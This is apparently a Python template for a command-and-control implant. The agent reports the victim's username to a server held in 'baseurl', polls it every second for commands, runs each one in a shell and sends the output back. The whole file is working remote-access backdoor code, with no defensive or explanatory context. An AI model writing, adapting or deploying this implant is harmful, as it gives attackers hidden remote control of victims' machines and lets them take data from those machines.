
#####   BEGIN TEMPLATE  #####
import os, time, _thread, requests
from subprocess import Popen, PIPE

def run_cmd(cmd):
        if ' ' in list(cmd) and cmd.split(" ")[0] == "cd":
                newdir = cmd.split(" ")[1]
                try:
                        os.chdir(newdir)
                        return "cd: newdir"
                except:
                        return "cd: %s: error" % newdir
        else:
                res = Popen(cmd,stdout=PIPE,shell=True).communicate()[0]
                try:
                        return res.decode()
                except:
                        return str(res)

agent = run_cmd("whoami")
requests.get(baseurl+"/new?agent="+agent)
def reply_cmd(cmd,id):
        res = run_cmd(cmd)
        requests.get((baseurl+"/res?id=%s&result=%s" % (id,res)))
while True:
        try:
                time.sleep(1)
                cmd = requests.get(baseurl + "/cmd?agent="+agent)
                if not cmd.content.decode() == "none":
                        data = cmd.json()
                        cmd = data['cmd']
                        id = data['id']
                        _thread.start_new_thread(reply_cmd, (cmd, id, ))
        except Exception as e:
                print("error: "+str(e))